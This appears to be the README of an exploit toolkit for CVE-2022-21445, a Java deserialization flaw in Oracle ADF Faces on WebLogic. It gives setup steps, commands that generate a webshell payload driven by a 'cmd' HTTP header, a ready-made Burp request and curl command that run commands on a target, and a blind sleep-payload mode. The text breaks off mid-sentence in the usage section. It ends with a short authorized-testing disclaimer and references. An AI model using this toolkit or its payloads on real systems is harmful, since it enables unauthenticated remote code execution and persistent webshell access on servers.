## https://sploitus.com/exploit?id=08B42BFC-3C65-5C4B-984D-082A533898C9
# CVE-2022-21445 Exploit - PoC
This toolkit generates exploit payloads for CVE-2022-21445, a critical Java deserialization vulnerability in Oracle ADF Faces `RemoteApplicationResourceLoader`. The exploit achieves **unauthenticated Remote Code Execution** via a crafted GET request.
## Prerequisites
| Requirement | Version | Purpose |
|-------------|---------|---------|
| **Python** | 3.6+ | Run the exploit script |
| **JDK** | 1.8 (8u202 recommended) | Compile and run Java payload generator |
---
## Setup Guide
### Install JDK 1.8
The payload **must** be compiled with JDK 1.8 to match the target's Java runtime.
```bash
# Use SDKMAN:
sdk install java 8.0.402-tem
# Select the java 8
sudo update-alternatives --config java
```
```bash
java -version # Should show 1.8.x
javac -version # Should show 1.8.x
```
### Optional - Install Docker (Use in case of Broken Jar)
This extracts the required Oracle JARs from the official FMW Infrastructure Docker image.
```bash
# Create the libs directory
mkdir -p libs/12.2.1.3
#or
mkdir -p libs/12.2.1.3
# Pull the Oracle FMW Infrastructure 12.2.1.3 or 12.2.1.4 image
# Note: You may need to accept the license at container-registry.oracle.com
docker pull container-registry.oracle.com/middleware/fmw-infrastructure:12.2.1.3.0
#OR
docker pull container-registry.oracle.com/middleware/fmw-infrastructure:12.2.1.4.0
#Let's say we need the JARs of 12.2.1.4 version (in case of 12.2.1.3 just replace .4 with .3 in the commands)
# Create a temporary container (don't need to start it)
docker create --name fmw1214_temp container-registry.oracle.com/middleware/fmw-infrastructure:12.2.1.4.0
# Extract the required JARs
docker cp fmw1214_temp:/u01/oracle/coherence/lib/coherence.jar ./libs/12.2.1.4/coherence.jar
docker cp fmw1214_temp:/u01/oracle/oracle_common/modules/oracle.adf.view/adf-richclient-api-11.jar ./libs/12.2.1.4/adf-richclient-api-11.jar
docker cp fmw1214_temp:/u01/oracle/oracle_common/modules/oracle.adf.view/adf-richclient-impl-11.jar ./libs/12.2.1.4/adf-richclient-impl-11.jar
docker cp fmw1214_temp:/u01/oracle/oracle_common/modules/oracle.adf.view/trinidad-api.jar ./libs/12.2.1.4/trinidad-api.jar
docker cp fmw1214_temp:/u01/oracle/oracle_common/modules/oracle.adf.view/trinidad-impl.jar ./libs/12.2.1.4/trinidad-impl.jar
```
> **Note:** The `javax.mail` JAR (needed for MIME base64 encoding) is **automatically downloaded** from Maven Central on first run. No manual setup required. The webshell payload uses pure reflection and does **not** need `weblogic.jar` at compile time.
## Usage
### Generate a Webshell Payload
Creates a payload that reads commands from the `cmd` HTTP header and returns output in the response body.
```bash
python3 exploit.py --version 12.2.1.4 --type webshell
```
Output:
```
[*] Target WebLogic version: 12.2.1.4
[*] Payload type: webshell
[*] Using JARs from: libs/12.2.1.4
[+] Step 1/4: Detecting ClassIdentity hash for 12.2.1.4...
[*] Detected ClassIdentity hash: 423B02C050017B24DB10DFF759AA56BF
[+] Step 2/4: Generating webshell payload class...
[+] Step 3/4: Compiling payload classes...
[+] Step 4/4: Generating serialized payload...
======================================================================
PAYLOAD GENERATED SUCCESSFULLY
======================================================================
[*] Payload type: webshell
[*] Payload length: 2156 characters
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
RAW PAYLOAD:
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
H4sIAAAAAAAAAA%3D%3DlVZb...
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
BURP REPEATER REQUEST:
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
GET /app/afr/foo/remote/H4sIAAAAAAAAAA%3D%3DlVZb.../ HTTP/1.1
Host: target:port
cmd: whoami
Connection: close
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
CURL COMMAND:
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
curl -k -H "cmd: id" "https://target:port/app/afr/foo/remote/H4sI.../"
```
### Generate a Sleep (Blind) Payload
For blind testing โ confirms code execution if the response is delayed.
```bash
python3 exploit.py --version 12.2.1.4 --type sleep --sleep-time 10
```
Send the payload and measure response time:
- **~10 seconds:** Code execution confirmed
- **Instant (
---
## Disclaimer
This tool is intended for **authorized security testing only**. Always obtain written permission before testing systems you do not own. The authors are not responsible for any misuse. Unauthorized access to computer systems is illegal.
---
## References
- [Oracle Critical Patch Update Advisory - April 2022](https://www.oracle.com/security-alerts/cpuapr2022.html)
- [CVE-2022-21445 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2022-21445)
- [hienkiet/CVE-2022-21445-for-12.2.1.3.0-Weblogic](https://github.com/hienkiet/CVE-2022-21445-for-12.2.1.3.0-Weblogic)